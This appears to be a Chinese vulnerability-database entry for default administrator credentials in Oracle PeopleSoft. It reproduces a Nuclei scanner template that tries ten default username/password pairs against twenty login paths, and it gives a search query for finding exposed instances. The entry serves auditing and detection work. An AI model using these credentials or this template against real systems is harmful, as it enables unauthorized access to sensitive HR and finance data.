漏洞信息
漏洞名称: Oracle PeopleSoft Default Login Vulnerability
漏洞类型: 弱口令
漏洞等级: 高危
漏洞描述: Oracle PeopleSoft是一款广泛使用的企业级应用软件,主要用于人力资源管理、财务管理等企业核心业务流程。它通常部署在企业内部网络中,作为关键业务系统的一部分。由于其广泛的应用,任何安全漏洞都可能对企业的信息安全构成严重威胁。该漏洞涉及Oracle PeopleSoft中存在默认管理员登录凭证的问题。攻击者可以利用这些默认凭证,无需任何认证即可访问系统,进而获取用户账户权限,访问敏感信息,修改数据或执行未授权操作。这种漏洞的技术根源在于系统部署时未能修改或禁用默认的登录凭证,属于典型的弱口令问题。由于攻击者可以利用此漏洞直接获得系统访问权限,其潜在的安全风险非常高,可能导致数据泄露、服务中断或其他恶意操作。此外,由于这是一个已知的默认凭证问题,攻击者可以自动化地利用此漏洞,增加了被大规模利用的风险。
产品厂商: Oracle
产品名称: PeopleSoft Enterprise PeopleTools
搜索语法: title:”Oracle PeopleSoft Sign-in”
来源: https://github.com/projectdiscovery/nuclei-templates/blob/b7c60754265d41e02af8d5ea7c8a40acba9a6233/http%2Fdefault-logins%2Foracle%2Fpeoplesoft-default-login.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
|
id: peoplesoft-default-login
info:
name: Oracle PeopleSoft - Default Login
author: LogicalHunter
severity: high
description: Oracle PeopleSoft contains a default admin login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://www.oracle.com/applications/peoplesoft/
- https://erpscan.io/press-center/blog/peoplesoft-default-accounts/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
cpe: cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 200
shodan-query: title:"Oracle PeopleSoft Sign-in"
product: peoplesoft_enterprise_peopletools
vendor: oracle
tags: default-login,peoplesoft,oracle,fuzz
http:
- method: POST
path:
- "{{BaseURL}}/psc/ps/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/csperf/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/FMPRD/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/csprd/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/hcmprdfp/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/HRPRODASP/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/guest/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/CSPRD_PUB/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/LHCGWPRD_1/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/CCHIPRD_2/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/applyuth/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/HRPRD/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/CAREERS/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/heprod_5/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/saprod/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/hr857prd_er/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/CHUMPRDM/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/HR92PRD/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/cangate_1/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/ihprd/?&cmd=login&languageCd=ENG"
body: "timezoneOffset=360&ptmode=f&ptlangcd=ENG&ptinstalledlang=ENG&userid={{username}}&pwd={{password}}&ptlangsel=ENG"
headers:
Content-Type: application/x-www-form-urlencoded
attack: pitchfork
payloads:
username:
- PS
- VP1
- PSADMIN
- PSEM
- PSHC
- PSCR
- HFG
- PSPY
- HHR_JPM
- HHR_CMP
password:
- PS
- VP1
- PSADMIN
- PSEM
- PSHC
- PSCR
- HFG
- PSPY
- HHR_JPM
- HHR_CMP
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: header
words:
- 'Set-Cookie: PS_TOKEN='
- type: status
status:
- 302
|